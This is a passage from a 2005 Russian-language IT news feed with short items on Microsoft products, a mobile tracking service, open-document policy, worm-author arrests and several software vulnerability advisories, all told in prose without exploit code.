ОАО "Мобильные ТелеСистемы" и компания Race Communications запустили услугу "Локатор", предназначенную для определения местоположения и координации сотрудников и транспорта компаний малого и среднего бизнеса. Услуга "Локатор" позволит организовать четкое и быстрое взаимодействие между сотрудниками компании, обеспечить их безопасность, предоставить обратную связь для руководства. На интерактивной карте города система покажет, где находится тот или иной автомобиль, когда курьер добрался до офиса партнеров, куда доставили товар или груз. Информация дублируется на мобильный телефон или электронную почту. В услуге предусмотрена возможность создавать группы абонентов (например, "курьеры", "торговые представители", "семья"), размещать на карте собственные объекты (офисы, склады, офисы партнеров и клиентов), рассылать SMS группам абонентов и получать от них информацию с привязкой к времени и местоположению, которая сразу же отобразится на электронной карте. Пользователь "Локатора" может существенно сэкономить свое время, установив режим определения местоположения абонентов с каким-либо интервалом или по расписанию: например, один раз в час с 9:00 до 18:00 по будним дням. Вся собранная информация сохраняется в базе данных и доступна на сайте услуги для последующего анализа - по итогам дня, недели, месяца. В ближайшее время подписчики новой услуги получат доступ к информации по дорожным пробкам и смогут планировать маршрут движения транспорта, чтобы сократить время доставки груза.
Подробнее об услуге

3/09/2005 11:49 Microsoft будет просвещать полицейских
Выступая на конференции Ассоциации по расследованию правонарушений в сфере высоких технологий (High Technology Crime Investigation Association), директор подразделения Microsoft по программам охраны законности Ричард Ламагна (Richard LaMagna) объявил, что в ноябре корпорация Microsoft собирается открыть новый онлайновый сервис для борцов с киберпреступностью. На сайте Law Enforcement Portal будет размещена справочная информация, юридическая документация для IT-сферы, а также тренинги по выполнению таких операций, как поиск информации на конфискованном жестком диске, отслеживание IP-адресов и маршрутов (trace route), а также использование службы Whois (определения принадлежности IP-адреса). "Мы считаем, что частный сектор просто обязан обеспечивать поддержку правоохранительным органам, особенно тем подразделениям, которые заняты борьбой с киберпреступностью. Между тем, до сих многие из сотрудников правоохранительных органов не знают, как отследить IP-адрес и вычислить интернет-домен", - отметил Ламагна. Microsoft также обещает обеспечивать сотрудникам правоохранительных органов "техническую поддержку" через свой новый сайт. На нём же будет размещена контактная информация о людях, взаимодействующих с правоохранительными органами внутри самой Microsoft, - чтобы сотрудники правоохранительных органов чётко знали, к кому обращаться. Ламагна также рассказал, что в настоящее время Microsoft время от времени проводит двухдневные тренинги по борьбе с бот-сетями - сетями зараженных троянами компьютеров, которыми хакеры пользуются для рассылок спама, проведения DDoS-атак и прочих "акций". Ближайший такой тренинг намечен на октябрь текущего года. На Law Enforcement Portal будет размещен инструментарий для обнаружения таких сетей.
"Компьюлента"

3/09/2005 11:27 Microsoft меняет подход к Unix
Microsoft прекращает работу над отдельным продуктом Services For Unix и планирует ввести Unix-функции в будущие версии своей операционной системы Windows Server. В пакете Services For Unix компания Microsoft традиционно предлагает инструменты, которые помогают компаниям интегрировать системы Windows и Unix. Одно время он был платным, но в начале прошлого года компания сделала эти инструменты бесплатными для заказчиков Windows. Microsoft намерена включить некоторые функции Services For Unix в обновление своей серверной ОС Windows Server 2003 R2, которое выйдет в конце этого года. В то же время компания сообщила, что она не планирует дальнейшие выпуски самостоятельного продукта Services For Unix. Директор отделения Windows Server Сэм Дистазио рассказал, что Microsoft не просто добавила новые компоненты SFU на диски Windows Server, а проделала значительную работу по углубленной интеграции этих функций с операционной системой. В частности, в R2 будет новая архитектура, которая позволит Windows-приложениям использовать интерфейсы программирования как Windows, так и Unix. Unix-службы планируется включать и в последующие релизы Windows Server, но Дистазио не исключает, что некоторые инструменты могут выходить и отдельно от ОС. Как и в случае с SFU, целью является поддержка заказчиков со смешанными системами Windows и Unix, а также тех, кто хочет перенести на Windows свои Unix-программы. Аналитик Directions on Microsoft Майкл Черри считает, что перевод служб Unix в основную операционную систему поможет компании решить такие задачи, как универсальное управление идентификационными данными в Windows- и не-Windows машинах. И хотя основная цель наличия Unix-служб остается все той же — позволить Windows работать в смешанной вычислительной среде, требования заказчиков несколько изменились. «Первоначально акцент делался на переход с (проприетарной) Unix на Windows, а теперь он заметно сместился на сосуществование с Linux», — заметил Черри.
ZDNet

3/09/2005 10:52 Американский штат принимает открытые стандарты
Штат Массачусетс планирует уйти от проприетарных форматов, разрешив только форматы файлов OpenDocument и PDF. С начала 2007 года администрация штата Массачусетс намерена использовать программное обеспечение на базе открытых стандартов, утверждает газета Financial Times. В среду администрация Массачусетса сделала шаг, который может нанести серьезный удар по Microsoft в ее борьбе против ПО с открытым исходным кодом: с начала 2007 года все документы, «создаваемые и сохраняемые» сотрудниками администрации, «должны быть основаны на открытых форматах». В проекте технологической стратегии штата администрация Массачусетса упоминает только два типа документов, которые можно будет использовать: OpenDocument, применяющийся в таких приложениях open source, как OpenOffice.org, и PDF, — утверждает Financial Times. OpenDocument, сокращение от OASIS Open Document Format for Office Applications, представляет собой открытый формат файлов для хранения таких деловых документов, как электронные таблицы, текстовые документы, диаграммы и презентации. Это формат файлов по умолчанию для OpenOffice 2.0, который в настоящее время существует в виде бета-версии.
Подробности

3/09/2005 10:31 F-Secure представила антивирус для мобильных телефонов
Финская фирма F-Secure представила антивирусную систему для мобильных телефонов, собщает в пятницу BBC News. Сами по себе мобильные вирусы пока не получили широкого распространения, но специалисты полагают, что при отсутствии должных мер они могут стать причиной серьезных проблем для пользователей мобильной связи во всем мире. Накануне в финской столице Хельсинки во время Чемпионата мира по легкой атлетике было обнаружено, что среди собравшихся на спортивные мероприятия людей по интерфейсу Bluetooth пытаются распространиться вредоносные программы. В настоящее время вирусописателям пока неизвестны способы заразить мобильную систему без ведома пользователя, к тому же быстрому распространению вирусов такого рода мешает многообразие мобильных платформ. Обычно вирус при распространении выдает себя за какую-либо "полезную" программу, пытаясь, связавшись с тем или иным устройством, убедить получателя согласиться на установку. Было выявлено, что во время чемпионата многие владельцы телефонов разрешали вирусам проникать в систему, и вредоносные программы распространялись далее, а зараженные телефоны временно переставали работать. По мнению специалистов F-Secure, к настоящему времени уже назрела необходимость защищать с помощью особых средств отдельные телефоны, несмотря на усилия сотовых операторов по нейтрализации вирусов в своих сетях (операторы, вместе с тем, не могут контролировать Bluetooth-соединения). В связи с этим компания и разработала свой новый продукт. Ранее на рынке уже появлялись мобильные антивирусы, однако они в основном создавались как средства для удаления из систем каких-либо конкретных вредоносных программ. Теперь производители решений в области компьютерной безопасности предлагают пользователям комплексные решения наподобие универсальных антивирусов для настольных компьютеров. F-Secure не является единственной фирмой, работающей над подобными решениями, также известно о ведущихся разработках в этой сфере Symantec, а также других производителей.
BBC News

2/09/2005 14:59 В партии портативных mp3-плейеров Creative Zen Neeon обнаружен вирус
Компания Creative Techology подтвердила появившуюся накануне информацию о том, что в партии из 3700 mp3-плейеров модели Zen Neeon, выпущенных в минувшем июле, содержит Windows-вирус W32.Wullik.B, сообщает издание PC Magazine. Об этом говорится в заявлении на японоязычном сайте компании. Вирус не представляет особой опасности, но теоретически может заразить Windows-систему, если его "достать" и запустить. Данная вредоносная программа была впервые обнаружена в ноябре 2003 года - она рассылает себя по электронной почте, а также копирует себя в произвольные места при заходе "проводником" зараженной Windows в папку, где уже лежит ее копия, и может таким образом распространяться на съемных носителях. Именно таким образом вирус попал с компьютера одного из инженеров Creative во внутреннюю файловую структуру плейера, уточнила в своем сообщении Creative. О том, планирует ли компания замену зараженных устройств, не сообщается. Заявление компании появилось через день после того, как она объявила о получении патента на ключевой элемент интерфейса mp3-плейера Zen, который также применяется в устройствах других производителей, в первую очередь - в плейере iPod основного конкурента Creative компании Apple.
Lenta.Ru

1/09/2005 13:07 Уязвимость в антивирусе Symantec
В антивирусном ПО Symantec - Symantec Anti Virus Corporate Edition обнаружена уязвимость (проверена в версиях 9.0.1.x, 9.0.4.x). Как пишет автор обнаруженной уязвимости, им была обнаружена довольно неприятная особенность этого продукта. Как известно, обновление антивирусных баз может производиться как с сервера LiveUpdate компании, так и из внутреннего корпоративного сервера, скачивающего обновления этого же сервера. При этом такая информация для доступа к серверу, как IP-адрес сервера, логин, пароль и пр. вводятся пользователем и сохраняются в зашифрованном виде в файле C:Documents and SettingsAll UsersApplication DataSymantecLiveUpdateSettings.LiveUpdate. Однако в файле C:Documents and SettingsAll UsersApplication DataSymantecLiveUpdateLog.Liveupdate, который формируется при проведении обновления информация сохраняется в незашифрованном виде. Так как доступ к этому файлу могут иметь все пользователи сервера, последствия подобной уязвимости очевидны. Компания Symantec сейчас работает над обновлением.
Описание

1/09/2005 12:08 Государство занялось фильтрацией Рунета
В понедельник стало известно, что Росинформтехнологии выбрало компанию «Андэк» для разработки программы для контент-фильтрации сайтов. Именно эта фирма победила в государственном тендере. Программы-файрволы для фильтрации трафика по содержанию, вроде SurfControl, довольно популярны в западных странах. Особенно часто такие программы устанавливают в школах, библиотеках, а также на домашних компьютерах, к которым имеют доступ дети. Фирмы, выпускающий подобный софт, постоянно обновляют базу «вредоносных» сайтов, а программный файрвол блокирует доступ к ним. Администратор может выбрать категории сайтов, доступ к которым будет запрещен с данного компьютера. Однако у таких программ есть несколько недостатков. Во-первых, современные дети разбираются в компьютерах гораздо лучше родителей и легко вскрывают парольную защиту контент-фильтра на персональном компьютере. Во-вторых, фильтрацию часто можно обойти с помощью прокси-серверов. В третьих, нередки случаи попадания нормальных сайтов в «стоп-лист» программы фильтрации. С другой стороны, абсолютно все «плохие» сайты учесть невозможно. В России контент-фильтры часто устанавливаются на рабочих компьютерах в коммерческих компаниях, в связи с тем, что многие начальники до сих пор ошибочно полагают, что нецелевое использование интернета ухудшает производительность труда. Кроме того, фильтрация контента может осуществляться и на государственном уровне. Например, во время президентский выборов в Беларуси государственный провайдер-монополист традиционно на несколько дней блокирует доступ к оппозиционным сайтам. Самая жесткая государственная веб-цензура — в Иране и Китае. Россия хотя и не вводит государственную цензуру, однако будет принимать активное участие в фильтрации контента. Государство выделяет деньги на разработку программы, а в будущем может обязать госучреждения установить эту программу в обязательном порядке. В связи с этим возникают опасения, что чиновники смогут влиять на разработчиков, спуская им списки неугодных сайтов для включения в «стоп-лист». Такая скрытая цензура крайне опасна, поэтому в западных странах не принято афишировать государственное участие в подобных проектах, ибо может разразиться большой скандал.
Более подробно

1/09/2005 12:05 Хакеры создали фальшивую страницу Yahoo
Неизвестные хакеры создали на хостинге Yahoo! Geocities страницу с бесплатными играми, по дизайну неотличимую от настоящей страницы портала. Главной целью создателей фальшивки являлись поля для ввода паролей, сообщили специалисты компании Trend Micro. Введя имя и пароль, пользователь попадал на страницу, содержащую фразу «страница взломана — будьте осторожны» на испанском языке. Старший системный инженер Trend Micro в Австралии и Новой Зеландии Адам Бивиано (Adam Biviano) сказал, что жертвы привлекались при помощи спамерской рассылки через интернет-пейджер Yahoo. Зачастую сообщения с призывом посетить страницу поступали от имени друзей. Бивиано сказал: «Это приманка (honeypot), привлекавшая людей к подписке на бесплатные игры. По моему мнению, она, вероятно, была разрекламирована спамом». Он не исключил возможности, что сообщения генерировались вирусом или другим вредоносным кодом, поскольку «интернет-пейджеры становятся все более популярными для вирусов». Единственной целью сайта, по словам Бивиано, была кража паролей. На прошлой неделе ряд вирусов уже атаковал пользователей интернет-пейджеров. Штамм Kelvir обращался к пользователям MSN Messenger на 10 языках, в зависимости от установок системы жертвы, а несколько недель назад червь Opanki пытался заразить пользователей при помощи якобы новой версии приложения для iTunes.
CNews

1/09/2005 11:43 В системе сетевого управления НР выявлена опасная брешь
В программном пакете HP OpenView Network Node Manager (NNM) выявлена опасная уязвимость. Комплекс, HP OpenView NNM обеспечивает высокофункциональное управление сетью предприятия, позволяя оптимизировать совокупную стоимость владения, повысить производительность и эффективность использования сетевых ресурсов. Инструменты, входящие в состав решения HP OpenView NNM, также позволяют сократить сроки поиска и устранения неисправностей. Проблема, о которой идет речь, связана с модулями connectedNodes.ovpl, cdpView.ovpl, freeIPaddrs.ovpl и ecscmg.ovpl. Эти компоненты некорректно обрабатывают входные данные перед их использованием в качестве параметров команды. В результате, злоумышленник, применяя сформированный специальным образом запрос, может получить доступ к удаленному компьютеру и выполнить на нем произвольные вредоносные операции. Брешь присутствует в пакетах HP OpenView NNM версий 6.2, 6.4, 7.01, 7.50 для операционных систем HP-UX, Solaris, Microsoft Windows NT/2000/XP и Linux. Специалисты французской организации FrSIRT (French Security Incident Response Team) охарактеризовали уязвимость высокоопасной. Ситуация ухудшается еще и тем, что патча для дыры в настоящее время не существует. В качестве временной меры защиты эксперты компании Hewlett-Packard рекомендуют переместить модули connectedNodes.ovpl, cdpView.ovpl, freeIPaddrs.ovpl и ecscmg.ovpl в другую директорию.
Описание

1/09/2005 11:29 Vista выйдет в декабре 2006 года?
По слухам, днем рождения следующей операционной системы Microsoft станет 7 декабря 2006 года. Утверждается, что уже установлена официальная дата выпуска Windows Vista — и что можно рассчитывать на своевременный выход операционной системы в конце будущего года. Согласно статье в Windows IT Pro, официальным днем выпуска полной версии Vista станет 7 декабря 2006 года, а вторая бета-версия продукта выйдет в конце этого года. Со ссылкой на «самые последние внутренние документы Microsoft» в статье утверждается также, что первый выпуск Release candidate операционной системы, RC0, появится 19 апреля будущего года, а второй — 28 июня. После этого, 9 августа Vista будет передана в производство. Первую бета-версию Vista тестеры уже получили в конце июля. До сих пор Microsoft отказывалась называть срок окончательной готовности Windows Vista, ранее известной как Longhorn. Еще в 2002 году Билл Гейтс объявил, что последователь ХР будет готов в 2005 году, а самая ранняя версия Vista впервые появилась в 2003 году. Сегодня официальная позиция софтверного гиганта заключается в том, что операционная система выйдет в конце 2006 года. Однако Microsoft отказалась подтвердить или опровергнуть дату 7 декабря.
Подробности

1/09/2005 10:21 Альтернативные браузеры затрудняют жизнь кибердетективам
Рост популярности Firefox и других альтернативных Internet Explorer браузеров означает, что полицейским придется обучаться новым приемам расследования компьютерных преступлений. Internet Explorer ничего не прячет от копов и других участников следствия, которые изучают ПК, чтобы установить, какие сайты посещал пользователь. Они знают, где находится буфер браузера IE, файлы cookie и журнал посещений и как прочесть эти файлы. К тому же в этом им могут помочь популярные инструменты экспертизы. Однако когда приходится иметь дело с такими браузерами, как Firefox и Opera, картина меняется. Эти программы используют другие структуры, файлы и систему имен для данных, за которыми охотятся следователи, и эти файлы расположены в иных местах жесткого диска, что в ходе следствия может вызвать проблемы. Более того, экспертное ПО может не поддерживать эти браузеры. В среду на многолюдном семинаре по альтернативным браузерам в рамках ежегодной конференции Ассоциации следователей по хайтек-преступлениям в Монтерее (штат Калифорния) Гленн Льюис рассказал, например, что одна из проблем, возникающих при работе с Firefox и Opera — определение веб-адресов, введенных не по гиперссылке, а вручную. В том случае, если подозреваемый утверждает, что он не преднамеренно посетил веб-сайт, а случайно кликнул на ссылке или был направлен туда автоматически, это трудно доказать, если адрес был физически введен в веб-браузер. Firefox и Opera хранят информацию о набранных URL не так, как IE, и эти файлы труднее расшифровать, сказал Льюис. Он продемонстрировал, как это сделать, своим студентам — главным образом агентам спецслужб и частным детективам. Льюис, который работает в консалтинговой компании Kroll, дал своим слушателям и другие полезные советы — как прочесть содержимое буфера или журнал посещений и файлы cookie, генерируемые Firefox и Opera. Он порекомендовал детективам и некоторые бесплатные инструменты, включая Opera 4 File Explorer, который отображает файлы из кэша Opera, и Web Historian от Red Cliff, экспортирующий информацию журналов посещений IE, Opera и Firefox в наглядную электронную таблицу Excel.
Подробности

31/08/2005 14:46 Уязвимость в Novell NetWare
Novell cообщает о наличии уязвимости в своей ОС Novell NetWare. Она присутствует в модуле CIFS.NLM, предназначенном для работы с файловой системой CIFS и связана с ошибкой при обработке длиня пароля. Позволяет провести DoS-атаку на сервер. Также производители уведомляют, что червь worm_rbot.ccc, использующий уязвимость ОС Windows, позволяет использовать эту уязвимость. Для устранения дыры рекомендуется применить CIFS апдейт, который доступен на сайте производителя. Для разных версий ОС (6.5 SP2, 6.5 SP3, 5.1 SP4, 6.0 SP1) выпущены отдельные обновления.
Описание

31/08/2005 13:52 ФСБ получит новые права на доступ к данным об абонентах операторов связи
Российское правительство утвердило правила взаимодействия операторов связи с уполномоченными государственными органами, осуществляющими оперативно-розыскную деятельность. Соответствующее постановление было подписано в среду премьер-министром страны Михаилом Фрадковым. Новые правила вступают в действие с 1 января 2006 года. По сообщению агентства CNews, согласно новым нормам, при проведении следственных действий взаимодействие с операторами связи будут осуществлять органы ФСБ, которые в случае необходимости могут представлять интересы других госструктур. "ФСБ и оператор связи будут совместно определять план мероприятий по внедрению технических средств в сети связи. Оператор связи обязан принимать меры по ограничению круга лиц, привлекаемых к установке технических средств, а также по недопущению раскрытия приемов проведения оперативно-розыскных мероприятий. Оператор связи обязан своевременно обновлять информацию, содержащуюся в базах данных об абонентах и оказанных им услугах. Данная информация должна храниться оператором связи в течение трех лет и предоставляться органам ФСБ при проведении мероприятий. База данных должна содержать следующую информацию об абонентах: фамилия, имя отчество, место жительства, реквизиты документа, удостоверяющего личность; наименование юрлица, его местонахождение, а также список лиц, использующих оконечное оборудование юрлица, с указанием фамилий, имен, отчеств, места жительства и паспортных данных; сведения баз данных о расчетах за оказанные услуги связи, в том числе о соединениях, трафике и платежах" - приводит агентство положения новых правил.
Текст постановления

31/08/2005 13:39 В браузере Internet Explorer найдена новая брешь
В самом распространенном браузере Microsoft Internet Explorer обнаружена очередная брешь, используя которую злоумышленники могут получить несанкционированный доступ к удаленному компьютеру и выполнить на нем произвольные деструктивные операции. Сообщение об уязвимости поступило от Тома Ферриса, независимого эксперта по вопросам сетевой безопасности. Для реализации нападения необходимо вынудить жертву открыть в IE сформированную особым образом HTML-страницу, при просмотре которой на машине возникает ошибка переполнения буфера. Более подробная информация о дыре из соображений безопасности не разглашается. Феррис отмечает, что поставил Microsoft в известность о существовании проблемы 14 августа. В корпорацию были направлены все технические данные и пример вредоносного кода. Как сообщает ZDNet, компания Microsoft в настоящее время изучает сообщение об уязвимости и при необходимости выпустит патчи. Брешь представляет опасность для пользователей операционной системы Windows ХР (в том числе со вторым сервис-паком) и браузера Internet Explorer шестой версии (и, возможно, более ранних модификаций). Способов устранения дыры на сегодняшний день не существует. Впрочем, в Microsoft отмечают, что реальных случаев эксплуатации уязвимости пока зафиксировано не было. Тем не менее, Феррис рекомендует воздержаться от работы с IE и по возможности выбрать какой-либо альтернативный браузер.
Подробности

31/08/2005 12:27 Microsoft упростит систему безопасности Windows
Microsoft встроит аппаратную защиту в Windows Vista, хотя запланированная ранее полная версия не будет реализована. Три года назад Microsoft представила стратегию безопасности Palladium, позднее переименованную в NGSCB. Ее готовили к внедрению в новых версиях Windows. Основа стратегии — аппаратная защита части системы от вредоносных программ, а также от перехвата путем шифрования обмена между аппаратными компонентами. Все это не будет реализовано в Windows Vista. Вместо этого будет TPM — чип, который содержит ключи и алгоритмы шифрования для защиты информации на диске. Технология Secure Startup не позволит считать данные с украденного жесткого диска, переставленного на другой компьютер. О защите такого рода говорил на прошлой неделе технический сотрудник Microsoft Стивен Хейл (Stephen Heil) на форуме разработчиков Intel (IDF). О переделке системы безопасности NGSCB в Microsoft говорили еще в мае прошлого года. Корпорацию критиковали за то, что многие приложения придется переписывать, и теперь она отреагировала на критику. На форуме Хейл говорил о необходимости внедрения последней спецификации TPM, версии 1.2, выпущенной в этом году. Эту версию поддержит Vista. Еще он призывал производителей ПО учитывать чип в своих программах и использовать преимущество его наличия. Пока неизвестно, в какой же версии Vista выйдет поддержка TMP и Secure Startup на его основе. Чип предназначен для корпоративных компьютеров, сказал Хейл, но не указал, какие именно разновидности системы его получат. Неизвестно, будет ли поддерживаться TPM в серверной ОС Longhorn, выпуск которой намечен на 2007 год. Trusted Computing Group, разработавшая спецификацию чипа, в июле выпустила руководство по использованию его в серверах. По словам Брайана Берджера (Brian Berger), руководителя рабочей маркетинговой группы TCG, «компьютеры с TPM уже поставляются 2,5 года». По данным IDC, в этом году будет поставлено около 25 млн. компьютеров с этим чипом. К 2010 он будет установлен практически в каждом ноутбуке.
Источник

31/08/2005 11:45 За продажу исходников Windows светит 10 лет тюрьмы
Продавцу украденных исходников ОС Windows, пойманному на горячем, грозит до 10 лет лишения свободы. На этой неделе в федеральном суде Манхэттена начался судебный процесс против 28-летнего жителя города Мериден, Вильяма Дженовезе-младшего (William P Genovese Jr.). Он обвиняется в том, что незаконно продавал и намеревался продавать дальше принадлежащие компании Microsoft исходники операционных систем Windows NT 4.0 и Windows 2000. Согласно обвинению, в феврале прошлого года неизвестное лицо незаконно завладело исходниками и распространило их по интернету без разрешения Microsoft. После этого подсудимый, пользуясь вымышленным именем illwill и почтовым адресом xillwillx@yahoo.com, разместил исходники на своем сайте и выставил их на продажу. В период между февралем и июлем прошлого года сыщик, нанятый компанией Microsoft, и тайный агент ФБР скачали копии украденных исходников и заплатили Джиновису через интернет. Молодой человек был арестован по обвинению в незаконном распространении технологии, имеющей законного владельца. Окончательный приговор, скорее всего, будет вынесен этой осенью. По словам Шона Хекера (Sean Hecker), адвоката Дженовезе, уголовный кодекс США при подобных преступлениях в качестве меры наказания предусматривает максимум 10 лет лишения свободы и штраф до $250 тыс., но в случае с подзащитным Хекера американский Минюст рекомендует присудить от 10 до 30 месяцев лишения свободы. Адвокат заявил о том, что обвиняемый с нетерпением ждет окончания процесса, работает полный рабочий день в компании своего отца и хочет стать полезным членом общества. По словам Хекера, Дженовезе не знает, кто именно изначально незаконно завладел исходниками ПО Microsoft.
CNews

31/08/2005 11:32 Арестованы двое подозреваемых в распространении червей
Следствие по делу о червях массовой почтовой рассылки Zotob и Mytob, организованное ФБР и Microsoft, привело к арестам в Турции и Марокко. Правоохранительные органы этих стран арестовали двух подозреваемых в распространении компьютерных червей, в том числе появившегося на прошлой неделе червя Zotob, который атаковал серверы American Express, The New York Times и других. В пятницу представитель ФБР Пол Брессон сообщил, что в Марокко арестован 18-летний уроженец России, марокканец Фарид Эссебар, а в Турции — 21-летний турок Атилла Экичи. Оба подозреваемых задержаны в конце прошлой недели и предстанут перед судом в тех странах, где они арестованы. Эссебар, который скрывался под псевдонимом Diabl0, и Экичи, известный как Coder, подозреваются в создании обоих червей Mytob и Zotob. На прошлой неделе червь Zotob и его варианты атаковали во всем мире компьютеры с операционной системой Microsoft Windows 2000, в том числе машины корпораций ABC, CNN и Daimler Chrysler. В Zotob содержится тот же код, что и в Mytob, черве, который появился в марте. На сегодняшний день известны 100 вариантов Mytob. Этот червь распространяется через спамеров и содержит лазейку, которая позволяет атакующим дистанционно управлять зараженными компьютерами. ФБР организовала расследование в кооперации с Microsoft и другими при содействии правоохранительных органов Марокко и Турции. Бюро утверждает, что обоих червей написал Эссебар, а затем переслал их Экичи. «Мы уверены, что у Эссебара был финансовый интерес», — сказал заместитель директора киберотдела ФБР Луис Ригель на селекторном совещании с представителями прессы. Другие подробности он не раскрыл. Расследование началось в конце марта, после появления Mytob. Когда вышел Zotob, оно активизировалось. Команда по расследованию интернет-преступлений Microsoft изучила червя и обнаружила следы, ведущие к двум подозреваемым, сообщил на селекторном совещании главный юрисконсульт Microsoft Брэд Смит. «След, который в конечном счете вывел нас на этих людей, появился в последние две недели, после выхода Zotob», — сказал он. Microsoft превозносит аресты как пример успешного сотрудничества частного сектора с правоохранительными органами. «Сегодня вся наша отрасль, особенно в партнерстве с силовиками, может действовать гораздо оперативнее, чем, скажем, два года назад, и отчасти благодаря этому стало возможным раскрыть это дело за пару недель», — сказал Смит.
Источник

31/08/2005 10:42 LinuxShip - дистрибутивы бесплатно!
Акция LinuxShip представляет собой ни что иное, как бесплатное распространение дистрибутивов свободной операционной системы GNU/Linux. Совершенно безвозмездно вы можете получить компакт-диски с этим ПО, просто сделав заказ на нашем сайте. Организатором LinuxShip является само сообщество свободного ПО в России. Распространением занимаются обычные люди, такие как мы с вами. Зачем им это надо? Ответ прост - они готовы тратить свои силы на развитие сообщества пользователей свободных программ, просто потому, что это доставляет им удовольствие. В акции участвуют 5 дистрибутивов GNU/Linux: Debian 3.1, Fedora Core 4, Gentoo 2005.1, Slackware 10.1 и Ubuntu 5.04. Вы вправе заказать любой интересующий вас, при этом не обязательно только один.
Скачать дистрибутивы

30/08/2005 14:50 Блог-сервис Microsoft работает на спамеров
Блог-сервис компании Microsoft под названием MSN Spaces быстро стал любимым местом хостинга спамеров: линки на него можно найти в 10% всего сетевого спама, объемы которого продолжают расти. Как заявили специалисты по инфобезопасности из компании SurfControl, спамеры используют блоггерскую службу компании Microsoft под названием MSN Spaces для размещения вредоносных кодов, рассылки спама и вирусов, а также хостинга рекламных сайтов, на которые зазывают спамерские письма. MSN Spaces, запущенный в конце прошлого года, представляет услуги бесплатного хостинга и файлообменный сервис. Зарегистрировавшись, пользователи могут разместить там свой блог и загрузить файлы для обмена. Относительно простая регистрация, по словам Чарльза Хонеманна (Charles Heunemann), исполнительного директора SurfControl, позволяет спамерам использовать почтовые адреса MSN для рассылки спама, а закачанные файлы — для совершения вирусных атак. Как говорит г-н Хонеманн, ранее спамеры активно использовали сервис Geocities (хостинговая служба от Yahoo), однако MSN, благодаря своей упрощенной системе регистрации, стал у злоумышленников более популярным. По заявлению SurfControl, 10% всего сетевого спама проходит через блоггерскую сеть Microsoft. По словам г-на Хонеманна, примерно три недели назад 30% сетевого спама направляли пользователей на рекламные сайты различных медикаментов, размещенные на Geocities. Однако постепенно спамеры переместили свой контент на MSN Spaces, и общее количество спамерских сайтов MSN достигло примерно 10%. «И мы думаем, что это не предел», — говорят специалисты.
CNews

30/08/2005 14:29 В открытой виртуальной машине Xen запущена ОС Windows
Компания XenSource сообщила об успешном запуске операционной системы Microsoft Windows (XP SP2) в среде Xen, что стало важным шагом на пути к коммерциализации открытой виртуальной машины. Программное обеспечение Xen, предназначенное для запуска множества операционных систем на одном компьютере, ранее обычно использовалось в связке с Linux, однако сложно переоценить важность возможности запуска и широко используемой ОС Windows. Позже в этом году XenSource планирует начать продажу программного обеспечения для управления Xen, получившего название XenOptimizer. Оно поможет пользователям Xen работать с виртуальной машиной.
Nixp.Ru

30/08/2005 13:42 OSDL отказала Microsoft
Как сообщает linux.org.ru со ссылкой на osnews, OSDL отказалась взаимодействовать с Microsoft в исследованиях, посвящённых сравнительному анализу Windows и Linux. "Никаких совместных исследований",-сказал Стюарт Коэн (Stuart Cohen). Как известно, некоторое время назад корпорация Microsoft обратилась в OSDL с предложением провести совместный сравнительный анализ систем Windows и Linux. После некоторого молчания, глава OSDL Стюарт Коэн (Stuart Cohen) решил ответить на него отказом. "Мы никоим образом не можем заниматься совместными исследованиями с Microsoft",-сообщил он.
Подробности

30/08/2005 13:20 Американские компьютерщики учатся спасать серверы от ураганов
Представители американской индустрии информационных технологий активно обсуждают методы защиты компьютерной техники от стихийных бедствий, подобных урагану "Катрина", который в настоящее время проходит по территории американского штата Луизиана и уже вызвал частичное затопление города Новый Орлеан. Как сообщает в понедельник издание CNet News, американские эксперты по компьютерной безопасности в настоящее время активно обсуждают способы резервирования данных и сохранения оборудования в экстремальных погодных условиях. Издание приводит слова специалиста авторитетной исследовательской компании Sans Institute Йоханнеса Ульриха (Johannes Ullrich): "Для людей в Нью-Орлеане и Миссисипи уже поздно начинать реализовывать спасательные схемы, но этот ураган наверняка расшевелит других и заставит думать о резервных схемах на случай катастроф". Ульрих призвал ИТ-компании не только разрабатывать схемы защиты информации и оборудования, но и испытывать их, чтобы возможные бедствия не застали компании врасплох. В качестве примера он представил разработанный в его организации проект Internet Storm Center, в рамках которого разработаны образцы схем резервирования и защиты высокотехнологичных информационных предприятий.
Подробности

30/08/2005 12:58 Microsoft представила первую бета-версию файловой системы WinFS
Компания Microsoft в понедельник впервые опубликовала бета-версию своей новой файловой системы WinFS, которая в будущем должна прийти на смену применяющейся ныне в ОС этой компании NTFS, впервые вышедшей в 1993 году в рамках ОС Windows NT 3.1. Как сообщает издание CNet News, первая бета-версия доступна только подписчикам сервиса Microsoft для разработчиков Microsoft Developer Network. Как известно, сначала планировалось, что WinFS будет использоваться в новой ОС Windows Vista, ранее известной как Longhorn, однако еще год назад было объявлено, что к официальному выходу Vista, который ожидается в 2006 году, создать окончательную версию WinFS не удастся, и в новая система будет также базироваться на NTFS. Первая бета-версия Windows Vista также вышла накануне. В Microsoft заявляют, что при работе с WinFS будет проще находить информацию как непосредственно на компьютерах, так и в рамках Windows-сетей. По словам представителей компании, можно сказать, что WinFS стирает границу между файловой системой и базой данных и обеспечивает универсальную программную среду для всех типов данных: структурированных, частично структурированных и неструктурированных.
Источник

29/08/2005 16:41 OpenGL в загоне? (Обновлена!)
Поступила довольно удручающая для всех геймеров информация. В очередной раз компания Microsoft "порадовала" пользователей своих ОС. По данным OpenGL.org разработчики софтверного гиганта отныне не будут включать в состав Windows свежие версии OpenGL, замораживая тем самым его развитие на версии 1.4. Более того, все приложения, работающие на OpenGL, будут иметь к нему доступ не напрямую, а через интерфейс DirectX, что заметно снизит скорость работы (возможно, на 50%, пишут разработчики). Этот шаг был предпринят Microsoft в связи с тем, что новые версии OpenGL оказались быстрее DirectX, что могло перевернуть с ног на голову ситуацию с созданием игр. Следует упомянуть, что OpenGL является стандартом 3D-графики в большинстве научных учреждений и профессиональных студий. На его основе также написано много игр, таких как Doom3, Quake, Homeworld, Serious Sam, Unreal и много других. В новых версиях Windows все они будут работать очень медленно.
Источник

29/08/2005 15:32 В реестре Windows можно прятать вредоносное ПО
